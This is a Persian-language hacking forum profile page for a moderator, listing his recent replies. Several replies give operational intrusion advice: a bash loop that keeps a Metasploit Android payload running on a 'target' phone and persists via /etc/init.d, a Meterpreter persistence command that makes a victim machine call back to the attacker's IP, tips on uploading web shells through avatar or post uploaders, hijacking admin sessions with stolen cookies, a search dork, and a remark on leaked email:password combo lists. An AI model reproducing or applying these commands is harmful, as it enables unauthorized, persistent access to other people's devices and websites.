رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

0x3a

Moderator
  • تعداد ارسال ها

    415
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    9
  • Country

    آنگولا

آخرین بار برد 0x3a در مهر 30

0x3a یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

20 Excellent

درباره 0x3a

  • تاریخ تولد ۹۷/۰۶/۲۴

Converted

  • Name
    Taha
  • Main os
    Windows
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

1,988 بازدید کننده نمایه
  1. 0x3a

    واقعیت vs تصورات😂😂

    دوست عزیز اینجا یک فروم علمی هست و از ارسال مطالب فکاهی خودداری کنید اخطار اول اخطار بعدی منجر به محدودیت فعالیت های شما می شود
  2. 0x3a

    دیتابیس سایت Canva.com

    سلام کمبو معمولا به صورت email:password هستند
  3. 0x3a

    Target Trainings

    سلام @Stubborn باید خدمتتون عرض کنم قبل از انتشار یک مطلب حتما از صحت اون مطلب مطمئن بشید از تمام این لیستی که گذاشتید یه دونه تارگتم درنمیاد چون لیستتون مال 2009 هست و بدرد نمیخوره از شما به عنوان یه یوزر حرفه ای انتظار هست که موارد به این سادگی رو رعایت کنید
  4. سلام دوست عزیز SSI در صفحات HTML با محتوای دینامیک رخ می دهد و در سمت وب سرور پردازش می شود اما هر دو جز دسته Code Injection هستند بخاطر همین شباهت هست
  5. 0x3a

    INZ APKTool

    راهی هست که برای امنیت سورس برنامه فرایند دیکامپایل رو سخت تر کرد؟
  6. 0x3a

    web shell root access

    از لینک زیر استفاده کن مشاهده لینک
  7. 0x3a

    Error Based Sql injection

    سلام اولا که در جای مناسب برای پرسیدن سوال تاپیک باز کنید و سوالتونو مثل همه خلق الله بپرسید دوما که شما اگر کوکی ادمین داشته باشید اگر لاگ اوت نکنه شما میتونید با افزونه های کوکی منیجر توی مرورگرای مختلف کوکی جایگزین کنید و به عنوان مدیریت وارد بشید
  8. 0x3a

    درخواست لینک سایت ها با دورک

    inurl:/register_from_website site:edu
  9. 0x3a

    web shell root access

    سوال اولتو دقیق متوجه نشدم اما برای سوال دوم یوزر و پس مستقیما نه اما با متود ریست پسورد cp میتونی اکسس بگیری
  10. 0x3a

    اپلود شل

    وبلاگ طور که فرمودید اگر ادیتور پست قابلیت اضافه کردن عکس داشت میتونید از اون طریق شلتونو آپ کنید یا از قسمت پروفایل ، عکس آواتار رو تغییر بدید خلاصه بگرد ببین کجا اپلودر هست حالا اگر از پنلت عکس بدی یا بیشتر توضیح بدی بیشترم میتونیم کمکت کنیم
  11. بله ولی کمی متفاوت تر هست کد زیر رو توی یک فایل با پسوند sh قرار بده اپلود کن روی تارگت اندرویدت #!/bin/bash while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done اسکرپیت رو با دستور uplaod file.sh به حافظه تارگتت انتقال بده 2 مسئله اینجا هست اگر تارگتت روت هست فایلتو توی مسیر /etc/init.d قرار بده که بعد هربار ریبوت فایل اجرا بشه اگر نیست هر جا اجرا کنی مهم نیست فقط نکته اینجاست که بعد ریبوت دسترسی از بین میره بعد از اجرا هم 2 مسئله هست اگر از استاتیک ای پی استفاده می کنی مشکلی نیست اگر روترت ریبوت بشه ولی اگر نداری اگر تارگتت ریبوت نکنه ولی روترت ریبوت بشه باز دسترسیتو از دست میدی موفق باشی
  12. سلام برای ماندگاری دسترسی باید از سرویس Meterpreter Persistence استفاده کنید ، با اینکار یک فایل درون Startup سیستم قربانی قرار داده می شود که باعث می شود طبق تعریفی که به آن در هنگام ساخت دادید به شما درخواست برای کانکت شدن ارسال کند meterpreter > run persistence -X -i 3 -p 4444 -r YOUR_IP سوییچ -X باعث می شود هرگاه سیستم قربانی روشن شد اسکریپت اجرا شود سوییچ -i برای تعیین فاصله زمانی بین هر درخواست برای کانکت شدن است سوییچ های -p و -r هم که مشخصا برای تعیین ip و port هست شما فقط کافیست هر زمان که نیاز به اتصال دوباره داشتید listener خود را روی پورتی که مشخص کردید ران کنید تا دوباره به تارگت متصل شوید موفق باشید
  13. 0x3a

    شروع و ورود به دنیای هک

    سلام بنظرم برای شروع کتاب Owasp top 10 و Web hacking 101 که هر دو pdf موجود در نت هست رو مطالعه کنید سطحتون ارتقا پیدا می کنه
  14. 0x3a

    مشکل در نفوذ به سایت با باگ xss

    سلام دوست عزیز لینک زیر مربوط به بایپس هایی هست که Owasp برای xss ارائه کرده میتونی چک کنی لینک
  15. 0x3a

    سوال امنیتی از دوستان کاربلد

    سلام خدمت دوست عزیز جواب بله هست از طریق پنل وردپرس می توان روی هاست شما شل اپلود کرد و از طریق شل هم سرورو مورد نفوذ قرار داد و به سایر هاست های روی سرور هم دسترسی پیدا کرد

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...